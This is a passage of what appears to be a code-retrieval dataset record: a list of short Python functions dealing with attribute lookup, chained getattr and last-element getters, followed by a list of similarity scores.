extra_info is not empty, return extra_info\n extra_info_func = _EXTRA_INFO_DESCRIPTION_MAP[attribute.name]\n extra_info = extra_info_func(attribute, die, self.section_offset)\n if extra_info:\n return extra_info\n\n # the last choice\n descr_func = _ATTR_DESCRIPTION_MAP[attribute.form]\n val_description = descr_func(attribute, die, self.section_offset)\n if val_description:\n return val_description\n\n return attribute.value", "def mineral_value(attribute):\n return attribute[1]", "def visit_Getattr(self, node):\n self.getattr_nodes.add(node)", "def rshift(self, attr):\n return self.set_child_and_return(shifter.rshift(self.statement, attr))", "def last_value(self):\n return 0", "def OnGetItemAttr( self, item ):\n if self.indicated > -1 and item == self.indicated:\n return self.indicated_attribute\n return None", "def get_attribute(self, attr):\n super().get_attribute(attr) # Keep this line, it triggers the parent class method.\n return getattr(self, attr)", "def last_value(self):\n return self._waveforms[-1].last_value", "def get_value(self):\n return self.last_value", "def lshift(self, attr):\n return self.set_child_and_return(shifter.lshift(self.statement, attr))", "def chained_getattr(obj, path):\n target = obj\n for attr in path:\n target = corner_case_getattr(target, attr)\n return target", "def _last_node(self):\n if self.trail[-1][1] is None or self.trail[-1][1].group():\n return self.trail[-1][0]\n else:\n return self.trail[-2][0]", "def deepgetattr(obj, attr, default=None, splitter='.', do_raise=False):\n try:\n return reduce(getattr, attr.split(splitter), obj)\n except AttributeError:\n if do_raise:\n raise\n return default", "def get_next(self):\n return self._next_previous_helper('next')", "def until_last(self, value: Any) -> List:\n matches = self._slice_helper(value, multiple_matches_forbidden=False)\n return type(self.parent)() if not matches else type(self.parent)(self.parent[:matches[-1]+1])", "def _get_node_attr(self, node, attr):\n return 
self.metrics[attr].ix[node]", "def _return_attr(self, *args, **kwargs):\r\n self.attr = [args, kwargs]\r\n return []", "def last_value(self):\n return self.samples[-1]", "def rget(obj, attrstr, default=None, delim='.'):\n try:\n parts = attrstr.split(delim, 1)\n attr = parts[0]\n attrstr = parts[1] if len(parts) == 2 else None\n if isinstance(obj, dict):\n value = obj[attr]\n elif isinstance(obj, list):\n value = obj[int(attr)]\n elif isinstance(obj, tuple):\n value = obj[int(attr)]\n elif isinstance(obj, object):\n value = getattr(obj, attr)\n if attrstr:\n return rget(value, attrstr, default, delim)\n return value\n except Exception:\n return default", "def get_attribute(self, attr):\n logger.debug(\"GET ATTRIBUTE {}\".format(attr))", "def value(self):\n return self.get_attribute(\"value\", str(self.children))", "def get_attr(graph: nx.Graph, attr: str):\n return [data[attr] for _, _, data in graph.edges.data()]", "def get_last_blockchain_value(self):\n # chekking if the blockchian is empty or not\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def __getattribute__(self, name):\n x = object.__getattribute__(self, name)\n if name.startswith(\"_\"):\n return x\n schema_cls = object.__getattribute__(self, Schema.__name__)\n if name in schema_cls.relationships:\n if object.__getattribute__(self, PillowtalkBase.UNMARSHALL): # locking marshalling prevents recursion\n # Decide to use original value or fullfilled value...\n r = schema_cls.relationships[name]\n if type(x) is r.mod2: # if relationship is already fullfilled\n return x\n else:\n new_x = self.fullfill_relationship(name)\n if new_x is not None and new_x != [None] and new_x != []:\n return new_x\n if issubclass(x.__class__, Relationship):\n raise TypeError(\"Relationship \\\"name\\\" was not correctly resolved.\")\n return x", "def __getattribute__(self, attr_k):\n # Getting the value of the field\n attr = object.__getattribute__(self, attr_k)\n attr_type = type(attr)\n if issubclass(attr_type, Field) or \\\n issubclass(attr_type, ReferenceManyField):\n return attr.value\n else:\n return attr", "def attribute(self, attribute):\n value = 3\n if self.age == \"child\":\n value -= 1\n if attribute == \"physique\" or attribute == \"phy\":\n if self.age == \"adult\":\n value += 1\n if self.gender == \"male\":\n value += 1\n elif self.gender == \"female\":\n value -= 1\n\n if attribute == \"sensitivity\" or attribute == \"sns\":\n if self.age == \"child\":\n value += 2\n if self.gender == \"male\":\n value -= 1\n elif self.gender == \"female\":\n value += 1\n\n if attribute == \"agility\" or attribute == \"agi\":\n if self.age == \"child\":\n value += 1 # to be equally as high as adult and young\n elif self.age == \"elder\":\n value -= 1\n\n if attribute == \"mind\" or attribute == \"mnd\":\n if self.age == \"elder\":\n value += 1\n\n for feature in self.features:\n if feature.name == \"blood\":\n for key in feature.modifiers:\n if attribute == key:\n value += feature.modifiers[key]\n\n if value < 1:\n value = 1\n return value", "def chain_offset(self):\n return self._chain_offset", "def dunder_to_chained_attrs(value, key):\n if '__' not in key:\n return getattr(value, key)\n first_key, rest_of_keys = key.split('__', 1)\n first_val = getattr(value, first_key)\n return dunder_to_chained_attrs(first_val, rest_of_keys)", "def after_last(self, value: Any) -> List:\n matches = self._slice_helper(value, multiple_matches_forbidden=False)\n return type(self.parent)() if not matches else 
type(self.parent)(self.parent[matches[-1]+1:])", "def GetAttribute(self, attr):\n return self._attrs[attr]", "def attribute_value(self):\n return self._attribute_value", "def last_el(x):\n if N.isscalar(x): return x\n else: return x[-1]", "def last_block(self):\n return self.chain[len(self.chain) - 1]", "def latestValue(self):\n if len(self.values) > 0:\n return self.values[-1]\n else:\n return 0", "def get_next(item: str, after: dict) -> str:\n item_followers = after.get(item, None)\n if item_followers is None:\n return None\n if len(item_followers) == 1:\n return item_followers[0]\n else:\n for item in item_followers:\n if all(is_predeccessor(after, item, x) for x in item_followers if item is not x):\n return item\n else:\n item_followers.sort()\n to_return = item_followers[0]\n after[to_return].extend(item_followers[1:])\n return to_return", "def __getattribute__ (self, attr):\n attrib = object.__getattribute__(self, attr)\n if not isinstance (attrib, RField):\n return attrib\n if attr not in self.locals:\n self.locals.append (attr)\n if self.newobj:\n if self.keyvals.has_key (attr):\n return self.keyvals[attr]\n else:\n fieldobj = object.__getattribute__(self, attr)\n return fieldobj.default\n\n answer = r.get (self.prepare_key (attr, self.seq))\n fieldobj = object.__getattribute__(self, attr)\n if answer == None:\n answer = fieldobj.default\n else:\n if isinstance (fieldobj, ForeignKey):\n fkey = r.get (self.prepare_key ('__relationfor__', self.seq))\n cls = globals ()[fkey]\n return cls.objects.get (id = answer)\n\n return answer", "def getLast(self):\r\n return self._data[-1]", "def __getattr__(self, attr):\n return self.get(attr)", "def _PrevExpression(self):\r\n self.RestoreExpression()\r\n self.expressionindex-=1\r\n return self.SetExpressionByIndex(self.expressionindex)", "def getCustomAttribute(self):\n\t\treturn self.Attribute", "def get_last_blockchain_value():\n return blockchain[-1]", "def visit_Attribute(self, node):\n self.generic_visit(node)\n if isinstance(node.ctx, ast.Load):\n args = [ node.value, ast.Str(node.attr) ]\n return to_call(to_name('getattr'), args)\n return node", "def last_block(self):\n return self.chain[-1]", "def last_block(self):\n return self.chain[-1]", "def get_propattr(self, naam, attr):\r\n h = self._root.find(naam)\r\n if h is None:\r\n h = \"\"\r\n else:\r\n hh = h.get(attr)\r\n if hh is None:\r\n h = \"\"\r\n else:\r\n h = hh\r\n return h", "def visit_Attribute(self, node):\n new_node = ast.Name(\"%s.%s\" % (node.value.id, node.attr), node.ctx)\n return ast.copy_location(new_node, node)", "def get_effective_value(vals):\n lst = sorted(vals.values(), key=lambda x: -x[1])\n anchor = 0 # The highest priority non-relative value (with comb=None)\n while anchor < len(lst) and lst[anchor][2]:\n anchor += 1\n if lst[anchor][2]:\n ## TODO we should say which one :-D\n raise RuntimeError(\"Value set contains only relative values\")\n val = lst[anchor][0]\n for (relval, _, comb) in reversed(lst[:anchor]):\n val = comb(val, relval)\n return val", "def __getattr__(self, attr):\n # operator - run\n if self.processors[attr].__class__ == op:\n return self.processors[attr](self)\n\n # attribute - cache value\n if not attr in self.values:\n self.values[attr] = self.processors[attr](self)\n # return cached attribute value\n return self.values[attr]", "def get_last_deep_child(ast_node):\n if not hasattr(ast_node, \"body\"):\n return ast_node\n return get_last_deep_child(ast_node.body[-1])", "def _update_max(self):\n tmp = self\n while tmp.right is not None:\n tmp 
= tmp.right\n return tmp.parent.key", "def get_chain(self):\n return self.chain" ]
[ "0.594284", "0.59209895", "0.5796574", "0.54958975", "0.54589653", "0.54450005", "0.5416079", "0.53792626", "0.5287629", "0.52547", "0.5249592", "0.5235394", "0.5232", "0.522848", "0.52224046", "0.520934", "0.52058285", "0.51851255", "0.51851255", "0.51851255", "0.51851255", "0.51851255", "0.5172809", "0.51690716", "0.51599085", "0.5152098", "0.51518416", "0.5143727", "0.5132943", "0.5121552", "0.50954056", "0.5089884", "0.50580585", "0.5052904", "0.5048498", "0.5046069", "0.5042822", "0.50131184", "0.5012317", "0.49945736", "0.49671975", "0.49644873", "0.49591053", "0.4959009", "0.4954268", "0.4954217", "0.49523816", "0.49465883", "0.4926271", "0.49255848", "0.4905284", "0.49003384", "0.48878595", "0.4878786", "0.48781803", "0.48715326", "0.48647955", "0.48501676", "0.4848787", "0.484418", "0.4840426", "0.4826105", "0.48243883", "0.48238483", "0.48074463", "0.47991538", "0.47974068", "0.47971192", "0.47952214", "0.47816235", "0.47813964", "0.4773487", "0.47653052", "0.4764526", "0.47614354", "0.47571263", "0.47566754", "0.4750751", "0.4747438", "0.47462493", "0.47454005", "0.47418162", "0.47404858", "0.47395834", "0.47393548", "0.47270525", "0.47247416", "0.4721348", "0.4720253", "0.47194657", "0.4711449", "0.47043794", "0.47043794", "0.4701576", "0.47002566", "0.46997198", "0.46864247", "0.4681871", "0.46817696", "0.4681563" ]
0.5363558
8
Get chain attribute for an object.
def chain_getattr(obj, attr, value=None): try: return _resolve_value(safe_chain_getattr(obj, attr)) except AttributeError: return value
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def safe_chain_getattr(obj, attr):\n return reduce(getattr, attr.split('.'), obj)", "def chained_getattr(obj, path):\n target = obj\n for attr in path:\n target = corner_case_getattr(target, attr)\n return target", "def deepgetattr(obj, attr):\n\t\treturn reduce(getattr, attr.split('.'), obj)", "def get_attr(obj, attr):\n return getattr(obj, attr)", "def chain(self, chain_id, model_num = 0):\n return self.struct[model_num][chain_id]", "def get_object_attribute_from_filter(obj, components):\n\n try:\n return getattr(\n obj, components[-1] if hasattr(obj, components[-1]) else components[-2]\n )\n except: return None", "def getChain(self, chain):\n\n\t\tfor i in self.chain:\n\t\t\tif i.name == chain:\n\t\t\t\treturn i\n\n\t\treturn None", "def getattribute(objeto, name: str):\r\n # Get internal dict value matching name.\r\n value = objeto.__dict__.get(name)\r\n if not value:\r\n # Raise AttributeError if attribute value not found.\r\n return None\r\n # Return attribute value.\r\n return value", "def get_nested_attr(__o: object, __name: str, *args) -> Any:\n def _getattr(__o, __name):\n return getattr(__o, __name, *args)\n return reduce(_getattr, [__o] + __name.split('.')) # type: ignore", "def pget(self, name):\n getter = attrgetter(name)\n attr = getter(self.pobj)\n return attr", "def pget(self, name):\n getter = attrgetter(name)\n attr = getter(self.pobj)\n return attr", "def __get__(self, obj, objtype=None):\n if obj is None:\n return self\n if self._isdecorator():\n if self.fdec is None:\n raise AttributeError(\"can't decorate with attribute\")\n return self.fdec(obj)\n else:\n return super().__get__(obj, objtype)\n # if self.fget is None:\n # raise AttributeError(\"unreadable attribute\")\n # return self.fget(obj)", "def get_from_object(obj, attribute):\n jsonpath_expr = parse_path(attribute)\n return_list = [i.value for i in jsonpath_expr.find(obj)]\n if return_list:\n return return_list[0]\n return None", "def get_chain(self):\n return self.chain", "def get_chain(self):\n return self.chain", "def deepgetattr(obj, attr):\n for key in attr.split('.'):\n obj = getattr(obj, key)\n return obj", "def deepgetattr(obj, attr, default=None, splitter='.', do_raise=False):\n try:\n return reduce(getattr, attr.split(splitter), obj)\n except AttributeError:\n if do_raise:\n raise\n return default", "def get_chain(self, chain_id):\n if self.chain_dict.has_key(chain_id):\n return self.chain_dict[chain_id]\n return None", "def get_attr(self, name: str):\n return self.call(name)", "def get_chain(self):\n return self.segment.chain", "def get_chain(self):\n return self.segment.chain", "def deepgetattr(obj, attr, default=AttributeError):\n try:\n return reduce(getattr, attr.split(\".\"), obj)\n except AttributeError:\n if default is not AttributeError:\n return default\n raise", "def __getattribute__(self,name):\n try:\n return object.__getattribute__(self,name)\n except AttributeError:\n extraPO = object.__getattribute__(self,'_extraPO')\n\n if hasattr(extraPO,name):\n return getattr(extraPO,name) # HIDDEN!\n\n _attr_err_msg = object.__getattribute__(self,'_attr_err_msg')\n\n raise AttributeError(_attr_err_msg(name,[self,extraPO]))", "def _obj_getattr(obj, fqdn, start=1):\n node = obj\n for chain in fqdn.split('.')[start:]:\n if hasattr(node, chain):\n node = getattr(node, chain)\n else:\n node = None\n break\n return node", "def _getter(obj, attr):\n _get = attrgetter(attr)\n try:\n return _get(obj)\n except:\n return None", "def __getattribute__(self, name):\n # special attribute that need to go 
straight to this obj\n if name in ['pget', 'pobj', '_delegate', '_wrap', '_get', \n '__class__', '__array_finalize__', 'view', '__tr_getattr__']:\n return object.__getattribute__(self, name)\n\n try:\n return self.__tr_getattr__(name)\n except:\n pass\n\n if hasattr(self.pobj, name):\n return self._wrap(name) \n \n return object.__getattribute__(self, name)", "def get_attr(obj: Any, key: str):\n if key.strip() == \"\":\n return obj\n for k in key.split(\".\"):\n obj = getattr(obj, k)\n return obj", "def get_attr(obj: Any, key: str):\n if key.strip() == \"\":\n return obj\n for k in key.split(\".\"):\n obj = getattr(obj, k)\n return obj", "def __getattr__(self, attr):\n return getattr(self.obj, attr)", "def __getattr__(self, attr):\n return getattr(self.obj, attr)", "def csv_getvalue(obj, path):\n path = path.split('__', 1)\n attr_name = path[0]\n\n if obj is None:\n # Record object is empty, return None\n return None\n if len(path) == 1:\n # Return the last leaf of the path after evaluation\n attr = csv_getattr(obj, attr_name)\n\n if isinstance(attr, models.Model):\n # Attribute is a model instance. Return unicode.\n return unicode(attr)\n elif hasattr(attr, '__call__'):\n # Attribute is a callable method. Return its value when called.\n return attr()\n else:\n # Otherwise, assume attr is a simple value\n return attr\n elif len(path) == 2:\n # More of path is remaining to be traversed\n attr = csv_getattr(obj, attr_name)\n\n if attr is None:\n return None\n elif isinstance(attr, models.Model):\n # If attribute is a model instance, traverse into it\n return csv_getvalue(attr, path[1])\n else:\n raise AttributeError('CsvForm: Attribute \\'{0}\\' on object \\'{1}\\' is not a related model'.format(\n attr_name,\n obj._meta.object_name,\n ))", "def get_chain(self, chain_id):\n if self.default_model is None:\n return None\n if self.default_model.chain_dict.has_key(chain_id):\n return self.default_model.chain_dict[chain_id]\n return None", "def _get_attr(self, attr, root=None):\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]", "def __getattribute__(self, name):\n return object.__getattribute__(object.__getattribute__(self, 'orig'),\n name)", "def add_attr(chain, attrs):\n chain.TotBandEnergy = attrs.get(\"TotBandEnergy\")\n if attrs.get(\"climbSet\", False):\n chain.climbSet = True\n chain.climbers = attrs.get(\"climbers\")\n chain.locks = attrs.get(\"locks\")\n return chain", "def __getattr__(self, attr):\n return self.get(attr)", "def _get(self, name):\n return object.__getattribute__(self, name)", "def _get(self, name):\n return object.__getattribute__(self, name)", "def get(self, attr):\r\n return self.__dict__.get(attr)", "def get_value(self):\n attr = getattr(self.obj, self.attr)\n try:\n args = self.args\n kwargs = self.kwargs\n return attr(*args, **kwargs)\n except AttributeError:\n return attr", "def getSlotAttrib(cls, obj):\n attr = None\n if obj.__class__ in restslotattributedict.keys():\n attr = restslotattributedict[obj.__class__]\n return attr", "def _resolve_attr(self, obj, attrspec):\n attrssplit = attrspec.split(\".\")\n attr = attrssplit[0]\n try:\n obj = obj[int(attr)] # In case list element\n except ValueError:\n try:\n obj = obj[attr]\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n if len(attrssplit) > 1:\n attrspec = attrspec.partition(\".\")[2] # right part of the string.\n 
return self._resolve_attr(obj, attrspec) # Recurse\n return obj", "def get_attribute(self, attr):\n logger.debug(\"GET ATTRIBUTE {}\".format(attr))", "def get_rel_attr(self, attr_name, model):\n rel_attr_name, attr_name = attr_name.split('.', 1)\n rel_attr = getattr(self.model, rel_attr_name, None)\n rel_model = None\n attr = None\n\n if rel_attr is not None:\n rel_model = rel_attr.property.mapper.class_\n attr = getattr(rel_model, attr_name, None)\n\n return (rel_model, attr)", "def get_attribute(self, name):\n\n pass", "def _get_attr_recursive(self, name, memo=None):\n # `name` is dot-delimited, so split it up into distinct names:\n name_list = name.split('.')\n # The first name has special treatment, since it might need to\n # be dynamically built:\n top_attr_name = name_list[0]\n # NOTE: This raises AttributeError if the attribute doesn't\n # exist. (Optional attributes should exist and be None-valued)\n attr = getattr(self, top_attr_name)\n # If this is an optional attribute and it hasn't been explicitly\n # provided, build it dynamically:\n if attr is None and top_attr_name in self.default_values:\n attr = self.build_param(top_attr_name, memo=memo)\n # If there are no further identifiers, we're done!\n if len(name_list) == 1:\n return attr\n # Otherwise, recursively call getattr on each sub-identifier.\n else:\n return reduce(getattr, name_list[1:], attr)", "def get_attributes(obj, attribute=None):\n # sliently return None when None is provided\n if obj is None:\n return None\n if isinstance(obj, list):\n if len(obj) == 0:\n return None\n obj = obj[0]\n if type(obj) is not dict or len(obj) == 0:\n logger.warn(\"unexpected format for obj: %s\", obj)\n return None\n cname = list(obj.keys())[0]\n if \"attributes\" not in obj[cname]:\n logger.warn(\"%s does not contain attributes: %s\", cname, obj)\n else:\n if attribute is not None:\n return obj[cname][\"attributes\"].get(attribute, None)\n # add children into 'attributes' so caller functions can pick up child nodes as well\n if \"children\" in obj[cname]:\n obj[cname][\"attributes\"][\"children\"] = obj[cname][\"children\"]\n if \"classname\" not in obj[cname][\"attributes\"]:\n obj[cname][\"attributes\"][\"classname\"] = cname\n return obj[cname][\"attributes\"]", "def check_attr(chain):\n attrs = {}\n if chain.climbSet:\n attrs[\"climbSet\"] = True\n attrs[\"climbers\"] = [int(i) for i in chain.climbers]\n attrs[\"locks\"] = chain.locks\n attrs[\"TotBandEnergy\"] = chain.TotBandEnergy\n\n return attrs", "def _fget(self):\n # type: (...) 
-> Any\n try:\n return getattr(self, private_attr)\n except AttributeError:\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n _get_type_name(type_), attr\n )\n )", "def chain_serial(self):\n return self.structure.chain_serial[self.mask]", "def rgetattr(obj, attr, *args):\n\n def _getattr(obj, attr):\n return getattr(obj, attr, *args)\n\n return functools.reduce(_getattr, [obj] + attr.split('.'))", "def get_attribute(self, lexeme: str) -> typing.Union[Attributes.Attributes]:\n return self._parent_node.get_attribute(lexeme)", "def __getattribute__(self, attr):\n try:\n return super(ObjectProxy, self).__getattribute__(attr)\n except AttributeError:\n info = sys.exc_info()\n try:\n return getattr(self._proxied, attr)\n except AttributeError:\n six.reraise(info[0], info[1], info[2].tb_next)", "def getattr(self, obj: t.Any, attribute: str) -> t.Any:\n try:\n return getattr(obj, attribute)\n except AttributeError:\n pass\n try:\n return obj[attribute]\n except (TypeError, LookupError, AttributeError):\n return self.undefined(obj=obj, name=attribute)", "def _get_object_prop(self, vm, attributes):\n result = vm\n for attribute in attributes:\n try:\n result = getattr(result, attribute)\n except (AttributeError, IndexError):\n return None\n return result", "def __getattr__ (self, attr):\n try:\n return self.get_value (attr)\n except exc.x_not_found:\n try:\n return self.get_key (attr)\n except exc.x_not_found:\n raise AttributeError", "def get_attribute(root, attribute):\n command_tree = [root]\n while command_tree:\n current_object = command_tree.pop()\n if hasattr(current_object, attribute):\n return getattr(current_object, attribute)\n\n parent = getattr(current_object, \"parent\", None)\n if parent:\n command_tree.append(parent)\n\n raise exception.ArestorException(\"The %(attribute)r attribute is \"\n \"missing from the object tree.\",\n attribute=attribute)", "def getattribute(self, name):\n return self.attributes[name]", "def get(self, attrname):\n return self.__dict__['_'+attrname]", "def __call__(self, context):\r\n return getattr(context.obj, self.getAttrName(context))", "def get_value(self, obj, attr, accessor=None, default=missing_):\n accessor_func = accessor or utils.get_value\n check_key = attr if self.attribute is None else self.attribute\n return accessor_func(obj, check_key, default)", "def __getattr__(self, attr): # or does it ?\n return self.X[attr]", "def getattr_nested(obj, attributes):\n def _getattr(obj, attribute):\n return getattr(obj, attribute)\n return functools.reduce(\n _getattr, [obj] + attributes.split(\".\")\n )", "def deepgetattr(obj, attr, default = None):\n attributes = attr.split(\".\")\n for i in attributes:\n try:\n obj = getattr(obj, i)\n except AttributeError:\n if default:\n return default\n else:\n raise\n return obj", "def __get_attr_helper(self, object, field, default=None):\n # TODO: Make PR to fix this ^ bug\n if hasattr(object, field):\n return getattr(object, field)\n\n return default", "def _getattr_path(obj: Any, path: str) -> Any:\n if not path:\n return None\n\n for attr in path.split('.'):\n obj = getattr(obj, attr, None)\n return obj", "def getattr_recursive(self, name):\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, 'getattr_recursive'):\n # Attribute not present, child is wrapper. 
Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def get_attr(self, name, default=None):\n try:\n return self.managedobjectattribute_set.get(key=name).value\n except ManagedObjectAttribute.DoesNotExist:\n return default", "def get_chain(self, **kwargs):\n self._check_if_fitted()\n return self._sampler.get_chain(**kwargs)", "def get(self, att):\n return getattr(self, att)", "def test_dotwiz_plus_get_attr():\n dd = DotWizPlus()\n dd.a = [{'one': 1, 'two': {'key': 'value'}}]\n\n item = getattr(dd, 'a')[0]\n assert isinstance(item, DotWizPlus)\n assert getattr(item, 'one') == 1\n\n assert getattr(getattr(item, 'two'), 'key') == 'value'\n # alternate way of writing the above\n assert item.two.key == 'value'", "def GetAttribute(self, attr):\n return self._attrs[attr]", "def csv_getattr(obj, attr_name):\n try:\n return getattr(obj, attr_name)\n except AttributeError:\n raise AttributeError('CsvForm: No \\'{0}\\' attribute found on \\'{1}\\' object'.format(\n attr_name,\n obj._meta.object_name,\n ))", "def __getattr__(self, name, saveattr=False):\n schema_cls = object.__getattribute__(self, Schema.__name__)\n if name in schema_cls.relationships:\n v = self.fullfill_relationship(name)\n if saveattr:\n setattr(self, name, v)\n return v\n # TODO: if attribute doesn't exist, attempt to update from database\n v = object.__getattribute__(self, name)\n return v", "def rgetattr(obj, attr, default=object()):\r\n if default is object():\r\n _getattr = getattr\r\n else:\r\n def _getattr(obj, name):\r\n \"\"\" Get an attribute from Krest object\"\"\"\r\n return getattr(obj, name, default)\r\n return functools.reduce(_getattr, [obj]+attr.split('.'))", "def get_attr(self, value):\n return self.index[value]", "def chain_name(self) -> str:\n return pulumi.get(self, \"chain_name\")", "def __getattr__(self, key):\n return self.get_attribute(key)", "def __getattr__(self, attr):\r\n\t\tif (attr in ['firmware', 'vfull', 'ifull', 'lifetime']):\r\n\t\t\treturn self.issue_command (command_id=attr, ch=None, operator='?', n_lines_requested=1)[0][0]", "def getattr_recursive(self, name: str) -> Any:\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, \"getattr_recursive\"):\n # Attribute not present, child is wrapper. 
Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def get_attr(attributes, name):\n try:\n return attributes.getValue(name)\n except KeyError:\n return None", "def _get_node_attr(self, node, attr):\n return self.metrics[attr].ix[node]", "def __getattr__(self, item):\n return getattr(self.__dict__['_obj'], item)", "def __getattr__(self, attributeName):\n\n return getattr(self.__decoratedObj, attributeName)", "def mineral_attr(attribute):\n return attribute[0]", "def rget(obj, attrstr, default=None, delim='.'):\n try:\n parts = attrstr.split(delim, 1)\n attr = parts[0]\n attrstr = parts[1] if len(parts) == 2 else None\n if isinstance(obj, dict):\n value = obj[attr]\n elif isinstance(obj, list):\n value = obj[int(attr)]\n elif isinstance(obj, tuple):\n value = obj[int(attr)]\n elif isinstance(obj, object):\n value = getattr(obj, attr)\n if attrstr:\n return rget(value, attrstr, default, delim)\n return value\n except Exception:\n return default", "def attribute(self):\n return getattr(self.parent_model, self.name)", "def __getattr__(self, attr):\n return getattr(self.door, attr)", "def get_chain(self, chain):\n if not self.atom_section:\n self.read_atoms_section()\n chain_lines = []\n for at_line in self.atom_section:\n if at_line[21:22] == chain:\n chain_lines.append(at_line)\n return \"\".join(chain_lines)", "def get_chain_name (chain):\n if \"-\" in chain.id:\n id_chain=chain.id[-1]\n else:\n id_chain=chain.id\n return id_chain", "def get_attr(self, attr_type):\n attr = attr_type()\n attr.attach_to(self.get_sobj(), self._bld)\n return attr", "def get_attr_impl(context, builder, typ, value, attr):\n if attr in typ.struct:\n # It's a struct field\n inst = context.make_helper(builder, typ, value=value)\n data_pointer = inst.data\n data = context.make_data_helper(builder, typ.get_data_type(),\n ref=data_pointer)\n return imputils.impl_ret_borrowed(context, builder,\n typ.struct[attr],\n getattr(data, _mangle_attr(attr)))\n elif attr in typ.jit_props:\n # It's a jitted property\n getter = typ.jit_props[attr]['get']\n sig = templates.signature(None, typ)\n dispatcher = types.Dispatcher(getter)\n sig = dispatcher.get_call_type(context.typing_context, [typ], {})\n call = context.get_function(dispatcher, sig)\n out = call(builder, [value])\n _add_linking_libs(context, call)\n return imputils.impl_ret_new_ref(context, builder, sig.return_type, out)\n\n raise NotImplementedError('attribute {0!r} not implemented'.format(attr))", "def chain_offset(self):\n return self._chain_offset", "def attribute(self, apath):\n return data.Attribute(self, apath)", "def __get__(self,obj,objtype):\n if not obj:\n return [getattr(objtype,a) for a in self.attribs]\n else:\n return [getattr(obj,a) for a in self.attribs]", "def __getattr__(self, attr):\n return self.product.get(attr, \"\")", "def _object_with_attr(self, name):\n for obj in self._objects:\n if hasattr(obj, name):\n return obj\n\n raise AttributeError(f\"No object has attribute {name!r}\")", "def __getattr__(self, name):\n\n if name not in self._extras:\n raise AttributeError(\"'%s' object has no attribute '%s'\" %\n (self.__class__.__name__, name))\n\n return self._extras[name]", "def __getattribute__(self, name):\n klass = object.__getattribute__(self, \"__class__\")\n if not klass.RELATIONSHIP_CACHE is None and klass.RELATIONSHIP_CACHE.has_key(name):\n 
if object.__getattribute__(self, 'id') is None:\n raise ReferenceNotSavedError, \"Cannot get/set relationship on unsaved object\"\n relationshipKlass, args = klass.RELATIONSHIP_CACHE[name]\n return relationshipKlass(self, name, args)\n return object.__getattribute__(self, name)", "def get_attribute(self, attribute):\r\n return self.connection.get_instance_attribute(self.id, attribute)" ]
[ "0.6868703", "0.65075165", "0.6485146", "0.64567274", "0.62154573", "0.61727905", "0.61658573", "0.6000796", "0.5964722", "0.5916216", "0.5916216", "0.5876859", "0.5874207", "0.5869589", "0.5869589", "0.5850275", "0.58463216", "0.58114004", "0.5795329", "0.57904404", "0.57904404", "0.5784626", "0.5782953", "0.57762647", "0.5772085", "0.57297087", "0.57264286", "0.57264286", "0.56935185", "0.56935185", "0.5683455", "0.56617904", "0.5646825", "0.5624613", "0.5606576", "0.5605053", "0.55627364", "0.55627364", "0.5559204", "0.5536571", "0.552858", "0.5526538", "0.55236167", "0.5498105", "0.54854345", "0.54639834", "0.5462136", "0.54508865", "0.54387707", "0.5437196", "0.54325294", "0.54226613", "0.5413573", "0.53883857", "0.53821623", "0.5372915", "0.53565866", "0.5345188", "0.5343703", "0.5343333", "0.5332021", "0.53287065", "0.5319923", "0.5315137", "0.53146124", "0.5313968", "0.53058344", "0.52951026", "0.52923703", "0.52911747", "0.52832425", "0.52759707", "0.52691835", "0.5264968", "0.5260354", "0.5252481", "0.5245224", "0.5241871", "0.52338064", "0.5233353", "0.52325916", "0.52205", "0.52187747", "0.5212827", "0.5212363", "0.5199243", "0.5196592", "0.5194686", "0.5188108", "0.51837164", "0.5175585", "0.5172254", "0.5167763", "0.51546675", "0.51492023", "0.51483935", "0.5147527", "0.5136472", "0.51337165", "0.51325023" ]
0.7126414
0
trim the list to make total length no more than limit. If split is specified, a string is returned.
def trim_iterable(iterable, limit, *, split=None, prefix='', postfix=''):
    if split is None:
        sl = 0
        join = False
    else:
        sl = len(split)
        join = True
    result = []
    rl = 0
    for element in iterable:
        element = prefix + element + postfix
        el = len(element)
        if len(result) > 0:
            el += sl
        rl += el
        if rl <= limit:
            result.append(element)
        else:
            break
    if join:
        result = split.join(result)
    return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def trim(self, input_words_list):\n def to_be_trimmed(x):\n if len(x) < 3:\n return False\n else:\n return True\n self.trimmed_words_list = list(filter(to_be_trimmed, input_words_list))\n # print('the filtered words are:')\n # for word in trimmed_words_list:\n # print(word)\n return self.trimmed_words_list", "def soar_trimlist(org_list):\n if not isinstance(org_list, list):\n return org_list\n return [element.strip() for element in org_list]", "def ltrim1 (l,proportiontocut,tail='right'):\r\n if tail == 'right':\r\n lowercut = 0\r\n uppercut = len(l) - int(proportiontocut*len(l))\r\n elif tail == 'left':\r\n lowercut = int(proportiontocut*len(l))\r\n uppercut = len(l)\r\n return l[lowercut:uppercut]", "def trimlist(self, iplist, maxIPs = 3):\n \n if len(iplist) > 0:\n iplist = iplist[:maxIPs:]\n return iplist\n else:\n print(\"Error: No IP A-records found.\")\n return None", "def ltrimboth (l,proportiontocut):\r\n lowercut = int(proportiontocut*len(l))\r\n uppercut = len(l) - lowercut\r\n return l[lowercut:uppercut]", "def repair_size_list(self, str_val):\n return [word for word in str_val[2:-2].split('\\', \\'')]", "def limit(st,length):\n return st[:length]", "def test_trim(self):\n s1 = 'esrdctfvubfiqisqwduonq'\n assert lws.trim(s1, 5) == 'esrdc...'\n assert lws.trim(s1, 20) == 'esrdctfvubfiqisqwduo...'\n s2 = 